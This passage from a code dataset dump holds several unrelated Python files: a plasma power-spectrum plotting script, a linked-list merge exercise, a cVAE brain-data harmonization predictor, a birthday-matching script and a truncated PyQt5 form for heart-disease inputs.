fpower3[0]\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n p1, = ax.loglog(kpara, fkpara_b, linewidth=2, label=r'$E_B(k_\\parallel)$')\n p2, = ax.loglog(kperp, fkperp_b, linewidth=2, label=r'$E_B(k_\\perp)$')\n p3, = ax.loglog(kpara, fkpara_v, linewidth=2, linestyle='--',\n color=p1.get_color(), label=r'$E_V(k_\\parallel)$')\n p4, = ax.loglog(kperp, fkperp_v, linewidth=2, linestyle='--',\n color=p2.get_color(), label=r'$E_V(k_\\perp)$')\n ax.loglog(kpower, fpower1 * fnorm1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2 * fnorm1, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3 * fnorm1, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.loglog(kpower, fpower1 * fnorm2, linewidth=1, color='k', linestyle='--')\n ax.loglog(kpower, fpower2 * fnorm2, linewidth=1, color='k', linestyle='-.')\n ax.loglog(kpower, fpower3 * fnorm2, linewidth=1, color='k', linestyle=':')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top='on')\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left='on')\n ax.tick_params(axis='y', which='major', direction='in')\n ax.set_xlim([1E-2, 1E1])\n ax.set_ylim([5E-9, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n fdir = '../img/power_spectrum/' + pic_run + '/mag_vel/'\n mkdir_p(fdir)\n fname = fdir + 'bvel_' + component + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef get_cmd_args():\n \"\"\"Get command line arguments\n \"\"\"\n default_pic_run = '3D-Lx150-bg0.2-150ppc-2048KNL'\n default_pic_run_dir = ('/net/scratch3/xiaocanli/reconnection/Cori_runs/' +\n default_pic_run + '/')\n parser = argparse.ArgumentParser(description='Analysis for Cori 3D runs')\n parser.add_argument('--pic_run', action=\"store\",\n default=default_pic_run, help='PIC run name')\n parser.add_argument('--pic_run_dir', action=\"store\",\n default=default_pic_run_dir, help='PIC run directory')\n parser.add_argument('--tframe', action=\"store\", default='20', type=int,\n help='Time frame')\n parser.add_argument('--multi_frames', action=\"store_true\", default=False,\n help='whether to analyze multiple frames')\n parser.add_argument('--time_loop', action=\"store_true\", default=False,\n help='whether to use a time loop to analyze multiple frames')\n parser.add_argument('--tstart', action=\"store\", default='0', type=int,\n help='starting time frame')\n parser.add_argument('--tend', action=\"store\", default='40', type=int,\n help='ending time frame')\n parser.add_argument('--bg', action=\"store\", default='0.2', type=float,\n help='Normalized guide field strength')\n parser.add_argument('--var_name', action=\"store\", default=\"ne\",\n help='variable name')\n parser.add_argument('--single_var', action=\"store_true\", default=False,\n help='whether to plot power spectrum for a single variable')\n parser.add_argument('--single_var_pub', action=\"store_true\", default=False,\n help='whether to plot power spectrum for a single ' +\n 'variable for publication')\n parser.add_argument('--mag_vel', action=\"store_true\", default=False,\n help='whether to plot power spectrum for for B and V')\n parser.add_argument('--mag_power', action=\"store_true\", default=False,\n help='whether to plot power spectrum of magnetic field')\n parser.add_argument('--component', action=\"store\", default=\"x\",\n help='which component (x/y/z)')\n return parser.parse_args()\n\n\ndef analysis_single_frames(plot_config, args):\n \"\"\"Analysis for multiple time frames\n \"\"\"\n tframe = args.tframe\n if args.single_var:\n plot_power_spectrum(plot_config)\n if args.single_var_pub:\n plot_power_spectrum_pub(plot_config)\n elif args.mag_vel:\n pspect_mag_vel(plot_config)\n elif args.mag_power:\n magnetic_power_spectrum(plot_config)\n\n\ndef process_input(plot_config, args, tframe):\n \"\"\"process one time frame\"\"\"\n plot_config[\"tframe\"] = tframe\n if args.single_var:\n plot_power_spectrum(plot_config, show_plot=False)\n\n\ndef analysis_multi_frames(plot_config, args):\n \"\"\"Analysis for multiple time frames\n \"\"\"\n tframes = range(plot_config[\"tstart\"], plot_config[\"tend\"] + 1)\n if args.time_loop:\n for tframe in tframes:\n print(\"Time frame: %d\" % tframe)\n plot_config[\"tframe\"] = tframe\n if args.single_var:\n plot_power_spectrum(plot_config, show_plot=False)\n elif args.single_var_pub:\n plot_power_spectrum_pub(plot_config, show_plot=False)\n elif args.mag_vel:\n pspect_mag_vel(plot_config, show_plot=False)\n else:\n ncores = multiprocessing.cpu_count()\n ncores = 32\n Parallel(n_jobs=ncores)(delayed(process_input)(plot_config, args, tframe)\n for tframe in tframes)\n\n\ndef main():\n \"\"\"business logic for when running this module as the primary one!\"\"\"\n args = get_cmd_args()\n plot_config = {}\n plot_config[\"pic_run\"] = args.pic_run\n plot_config[\"pic_run_dir\"] = args.pic_run_dir\n plot_config[\"tframe\"] = args.tframe\n plot_config[\"tstart\"] = args.tstart\n plot_config[\"tend\"] = args.tend\n plot_config[\"var_name\"] = args.var_name\n plot_config[\"component\"] = args.component\n plot_config[\"bg\"] = args.bg\n if args.multi_frames:\n analysis_multi_frames(plot_config, args)\n else:\n analysis_single_frames(plot_config, args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/cori_3d_fft.py","file_name":"cori_3d_fft.py","file_ext":"py","file_size_in_byte":23545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"249542434","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 3 22:27:22 2019\n\n@author: sofiawangy\n\"\"\"\n\nclass ListNode:\n\n def __init__(self, x):\n\n self.val = x\n\n self.next = None\n\n \n\nll1 = ListNode(1)\nll1.next = ListNode(2)\nll1.next.next = ListNode(4)\n\nll2= ListNode(1)\nll2.next = ListNode(3)\nll2.next.next = ListNode(4)\n\n#print(ll1.val, ll1.next.val, ll1.next.next.val)\n\n#print(ll2.val, ll2.next.val, ll2.next.next.val)\n\ndef mergeTwoLists1(l1, l2):\n\n dummy = cur = ListNode(0)\n\n while l1 and l2: # neither of l1 or l2 can be None\n\n if l1.val < l2.val:\n\n cur.next = l1\n# print(\"cur:\")\n# test2 = cur\n# while test2:\n# print(test2.val)\n# test2 = test2.next\n\n l1 = l1.next\n# print(\"l1:\")\n# print(l1.val)\n# print('dummy')\n# test = dummy\n# while test:\n# print(test.val)\n# test = test.next\n \n else:\n\n cur.next = l2 # first time here: l1.val = 1, l2.val = 1\n# print(\"cur:\")\n# test2 = cur\n# while test2:\n# print(test2.val)\n# test2 = test2.next\n# \n# print('dummy')\n# test = dummy\n# while test:\n# print(test.val)\n# test = test.next\n\n l2 = l2.next\n# print(\"l2:\")\n# print(l2.val)\n cur = cur.next\n# test = dummy #cur's 2nd node gets iterated througout the while loop, how come dummy gets iterated only on nth term?\n#\n# print(\"final cur:\")\n\n# while test:\n#\n# print(test.val)\n#\n# test = test.next\n\n cur.next = l1 or l2 #what does l1 or l2 mean?\n\n return dummy.next\n\n \n\nnew_head = mergeTwoLists1(ll1,ll2)","sub_path":"21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"166584314","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\nWritten by Lijun An and CBIG under MIT license:\nhttps://github.com/ThomasYeoLab/CBIG/blob/master/LICENSE.md\n'''\nimport os\nimport torch\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom config import global_config\nfrom utils.nn_misc import vae_harm_predict\nfrom utils.misc import \\\n create_folder, load_pkl, txt2list, one_hot, replace_with_harmed_ROI_wrapper\n\n\ndef predict_cvae_args_parser():\n \"\"\"\n Parameters for making prediction using trained cVAE model\n \"\"\"\n parser = argparse.ArgumentParser(prog='PredcVAEArgs')\n # input and output path\n parser.add_argument('--raw_data_path', type=str, default='/')\n parser.add_argument('--harm_input_path', type=str, default='/')\n parser.add_argument('--checkpoint_path', type=str, default='/')\n parser.add_argument('--harm_output_path', type=str, default='/')\n parser.add_argument('--dataset_pair', type=str, default='ADNI-AIBL')\n parser.add_argument('--exp', type=str, default='unmatch2match')\n parser.add_argument('--nb_pred', type=int, default=100)\n parser.add_argument('--nb_folds', type=int, default=10)\n parser.add_argument(\n '--harm_files', type=list, default=['train', 'val', 'test'])\n parser.add_argument(\n '--origin_files', type=list, default=['train', 'val', 'test'])\n # in case there are unexcepted args\n pred_args, _ = parser.parse_known_args()\n\n return pred_args\n\n\ndef predict(args):\n \"\"\"\n Making prediction using trained cVAE model\n\n Args:\n args (tuple): Parameters\n \"\"\"\n if args.exp == 'unmatch2match':\n args.harm_files = ['train', 'val', 'unmatch2match_test']\n args.origin_files = [\n 'unmatch2match_train', 'unmatch2match_val', 'unmatch2match_test'\n ]\n elif args.exp == 'match2unmatch':\n args.harm_files = ['train', 'val', 'match2unmatch_test']\n args.origin_files = [\n 'match2unmatch_train', 'match2unmatch_val', 'match2unmatch_test'\n ]\n else:\n args.harm_files = [\n 'train', 'val', 'unmatch2match_test', 'unmatch2match_train_full',\n 'unmatch2match_val_full'\n ]\n args.origin_files = [\n 'unmatch2match_train', 'unmatch2match_val', 'unmatch2match_test',\n 'unmatch2match_train_full', 'unmatch2match_val_full'\n ]\n assert 'train' in args.harm_files, 'train data is missing'\n ROIs = txt2list(global_config.ROI_features_path)\n for fold in range(args.nb_folds):\n fold_data_path = os.path.join(args.harm_input_path, args.dataset_pair,\n str(fold))\n fold_checkpoint_path = os.path.join(\n args.checkpoint_path, 'harm_model', 'cVAE', args.dataset_pair,\n str(fold))\n fold_output_path = os.path.join(args.harm_output_path,\n args.dataset_pair, 'cVAE', str(fold))\n create_folder(fold_output_path)\n # load model\n model = torch.load(\n os.path.join(fold_checkpoint_path, 'cVAE.pt'), map_location='cpu')\n model.to(torch.device('cpu'))\n model.eval()\n # load training mean and training std\n train_pkl = load_pkl(os.path.join(fold_data_path, 'train.pkl'))\n mean = train_pkl['mean'][ROIs].values\n std = train_pkl['std'][ROIs].values\n for harm_file in args.harm_files:\n harm_pkl = load_pkl(\n os.path.join(fold_data_path, harm_file + '.pkl'))\n roi_array = harm_pkl['data'][ROIs].values\n site_onehot = one_hot(harm_pkl['data']['SITE'].values)\n x = np.concatenate((roi_array, site_onehot), axis=1)\n x = torch.tensor(x).float()\n x_hat = np.zeros_like(roi_array)\n x_hat_map2ADNI = np.zeros_like(roi_array)\n x_hat_intermediate = np.zeros_like(roi_array)\n sites_map2ADNI = torch.tensor(np.zeros_like(site_onehot)).float()\n sites_map2ADNI[:, 0] = 1\n sites_intermediate = torch.tensor(\n np.zeros_like(site_onehot)).float()\n for i in range(args.nb_pred):\n x_hat += \\\n vae_harm_predict(model, x, i) / args.nb_pred\n x_hat_map2ADNI += \\\n vae_harm_predict(\n model, x, i, sites_map2ADNI) / args.nb_pred\n x_hat_intermediate += \\\n vae_harm_predict(\n model, x, i, sites_intermediate) / args.nb_pred\n # denormalization\n x_hat_map2ADNI = (x_hat_map2ADNI * std) + mean\n for i in range(mean.shape[0]):\n x_hat_map2ADNI[:, i][x_hat_map2ADNI[:, i] <= 0] = mean[i]\n x_hat_map2ADNI_df = pd.DataFrame(data=x_hat_map2ADNI, columns=ROIs)\n map2ADNI_save_name = 'harm_' + harm_file + '_ROI-map2ADNI.csv'\n x_hat_map2ADNI_df.to_csv(\n os.path.join(fold_output_path, map2ADNI_save_name),\n index=False,\n sep=',')\n x_hat_intermediate = (x_hat_intermediate * std) + mean\n for i in range(mean.shape[0]):\n x_hat_intermediate[:, i][\n x_hat_intermediate[:, i] <= 0] = mean[i]\n x_hat_intermediate_df = pd.DataFrame(\n data=x_hat_intermediate, columns=ROIs)\n intermediate_save_name = \\\n 'harm_' + harm_file + '_ROI-intermediate.csv'\n x_hat_intermediate_df.to_csv(\n os.path.join(fold_output_path, intermediate_save_name),\n index=False,\n sep=',')\n x_hat = (x_hat * std) + mean\n for i in range(mean.shape[0]):\n x_hat[:, i][x_hat[:, i] <= 0] = mean[i]\n x_hat_df = pd.DataFrame(data=x_hat, columns=ROIs)\n save_name = 'harm_' + harm_file + '_ROI-recon.csv'\n x_hat_df.to_csv(\n os.path.join(fold_output_path, save_name),\n index=False,\n sep=',')\n # replace by harmonized ROIs\n # reconstruction\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-recon')\n # map2ADNI\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-map2ADNI')\n # intermediate\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-intermediate')\n\n\nif __name__ == '__main__':\n predict(predict_cvae_args_parser())\n","sub_path":"stable_projects/predict_phenotypes/An2022_gcVAE/harmonization/cVAE/predict_cVAE.py","file_name":"predict_cVAE.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534309723","text":"import json\n\nwith open('./players.json') as p:\n data = json.load(p)\n\nbirthdayinput = input(\"Enter your birthday in year-month-date format: \")\n\nfor key in data:\n bday = data.get(key).get(\"birth_date\")\n fullname = data.get(key).get(\"full_name\")\n if not bday:\n continue\n elif bday == birthdayinput:\n print(F\"{fullname} is your birthday bro\")\n","sub_path":"birthdaybros.py","file_name":"birthdaybros.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"342243502","text":"# -*- coding: utf-8 -*-\r\nfrom fbs_runtime.application_context.PyQt5 import ApplicationContext\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(671, 555)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 672, 561))\r\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\r\n self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)\r\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem)\r\n self.label_title = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.label_title.sizePolicy().hasHeightForWidth())\r\n self.label_title.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label_title.setFont(font)\r\n self.label_title.setStyleSheet(\"\")\r\n self.label_title.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_title.setObjectName(\"label_title\")\r\n self.verticalLayout.addWidget(self.label_title)\r\n spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem1)\r\n self.horizontalLayout_1 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_1.setObjectName(\"horizontalLayout_1\")\r\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem2)\r\n self.label_age = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_age.setObjectName(\"label_age\")\r\n self.horizontalLayout_1.addWidget(self.label_age)\r\n self.spinBox_age = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_age.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_age.setObjectName(\"spinBox_age\")\r\n self.horizontalLayout_1.addWidget(self.spinBox_age)\r\n spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem3)\r\n self.label_gender = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_gender.setObjectName(\"label_gender\")\r\n self.horizontalLayout_1.addWidget(self.label_gender)\r\n self.comboBox_gender = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_gender.sizePolicy().hasHeightForWidth())\r\n self.comboBox_gender.setSizePolicy(sizePolicy)\r\n self.comboBox_gender.setObjectName(\"comboBox_gender\")\r\n self.comboBox_gender.addItem(\"\")\r\n self.comboBox_gender.addItem(\"\")\r\n self.horizontalLayout_1.addWidget(self.comboBox_gender)\r\n spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem4)\r\n self.verticalLayout.addLayout(self.horizontalLayout_1)\r\n spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem5)\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem6)\r\n self.label_bp = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_bp.setObjectName(\"label_bp\")\r\n self.horizontalLayout_2.addWidget(self.label_bp)\r\n self.spinBox_bp = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_bp.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_bp.setMaximum(999)\r\n self.spinBox_bp.setObjectName(\"spinBox_bp\")\r\n self.horizontalLayout_2.addWidget(self.spinBox_bp)\r\n spacerItem7 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem7)\r\n self.label_cp = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_cp.setObjectName(\"label_cp\")\r\n self.horizontalLayout_2.addWidget(self.label_cp)\r\n self.comboBox_cp = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_cp.sizePolicy().hasHeightForWidth())\r\n self.comboBox_cp.setSizePolicy(sizePolicy)\r\n self.comboBox_cp.setObjectName(\"comboBox_cp\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.horizontalLayout_2.addWidget(self.comboBox_cp)\r\n spacerItem8 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem8)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n spacerItem9 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem9)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n spacerItem10 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem10)\r\n self.label_chol = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_chol.setObjectName(\"label_chol\")\r\n self.horizontalLayout_3.addWidget(self.label_chol)\r\n self.spinBox_chol = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_chol.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_chol.setMaximum(999)\r\n self.spinBox_chol.setObjectName(\"spinBox_chol\")\r\n self.horizontalLayout_3.addWidget(self.spinBox_chol)\r\n spacerItem11 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem11)\r\n self.label_fbs = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_fbs.setObjectName(\"label_fbs\")\r\n self.horizontalLayout_3.addWidget(self.label_fbs)\r\n self.spinBox_fbs = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_fbs.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_fbs.setMaximum(999)\r\n self.spinBox_fbs.setObjectName(\"spinBox_fbs\")\r\n self.horizontalLayout_3.addWidget(self.spinBox_fbs)\r\n spacerItem12 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem12)\r\n self.verticalLayout.addLayout(self.horizontalLayout_3)\r\n spacerItem13 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem13)\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\r\n spacerItem14 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem14)\r\n self.label_restecg = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_restecg.setObjectName(\"label_restecg\")\r\n self.horizontalLayout_4.addWidget(self.label_restecg)\r\n self.comboBox_restecg = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_restecg.setObjectName(\"comboBox_restecg\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.horizontalLayout_4.addWidget(self.comboBox_restecg)\r\n spacerItem15 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem15)\r\n self.label_maxhrt = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_maxhrt.setObjectName(\"label_maxhrt\")\r\n self.horizontalLayout_4.addWidget(self.label_maxhrt)\r\n self.spinBox_maxhrt = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_maxhrt.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_maxhrt.setMaximum(999)\r\n self.spinBox_maxhrt.setObjectName(\"spinBox_maxhrt\")\r\n self.horizontalLayout_4.addWidget(self.spinBox_maxhrt)\r\n spacerItem16 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem16)\r\n self.verticalLayout.addLayout(self.horizontalLayout_4)\r\n spacerItem17 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem17)\r\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\r\n spacerItem18 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem18)\r\n self.label_exang = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_exang.setObjectName(\"label_exang\")\r\n self.horizontalLayout_5.addWidget(self.label_exang)\r\n self.comboBox_exang = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_exang.sizePolicy().hasHeightForWidth())\r\n self.comboBox_exang.setSizePolicy(sizePolicy)\r\n self.comboBox_exang.setObjectName(\"comboBox_exang\")\r\n self.comboBox_exang.addItem(\"\")\r\n self.comboBox_exang.addItem(\"\")\r\n self.horizontalLayout_5.addWidget(self.comboBox_exang)\r\n spacerItem19 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem19)\r\n self.label_oldpeak = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_oldpeak.setObjectName(\"label_oldpeak\")\r\n self.horizontalLayout_5.addWidget(self.label_oldpeak)\r\n self.doubleSpinBox_oldpeak = QtWidgets.QDoubleSpinBox(self.verticalLayoutWidget)\r\n self.doubleSpinBox_oldpeak.setMinimumSize(QtCore.QSize(50, 0))\r\n self.doubleSpinBox_oldpeak.setDecimals(1)\r\n self.doubleSpinBox_oldpeak.setObjectName(\"doubleSpinBox_oldpeak\")\r\n self.horizontalLayout_5.addWidget(self.doubleSpinBox_oldpeak)\r\n spacerItem20 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem20)\r\n self.label_thal = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_thal.setObjectName(\"label_thal\")\r\n self.horizontalLayout_5.addWidget(self.label_thal)\r\n self.comboBox_thal = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_thal.setObjectName(\"comboBox_thal\")\r\n self.comboBox_thal.addItem(\"\")\r\n self.comboBox_thal.addItem(\"\")\r\n self.comboBox_thal.addItem(\"\")\r\n self.horizontalLayout_5.addWidget(self.comboBox_thal)\r\n spacerItem21 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem21)\r\n self.verticalLayout.addLayout(self.horizontalLayout_5)\r\n spacerItem22 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem22)\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n spacerItem23 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem23)\r\n self.label_slope = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_slope.setObjectName(\"label_slope\")\r\n self.horizontalLayout_6.addWidget(self.label_slope)\r\n self.comboBox_slope = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_slope.setObjectName(\"comboBox_slope\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.horizontalLayout_6.addWidget(self.comboBox_slope)\r\n spacerItem24 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem24)\r\n self.label_coves = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_coves.setObjectName(\"label_coves\")\r\n self.horizontalLayout_6.addWidget(self.label_coves)\r\n self.comboBox_coves = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_coves.setObjectName(\"comboBox_coves\")\r\n self.comboBox_coves.addItem(\"\")\r\n 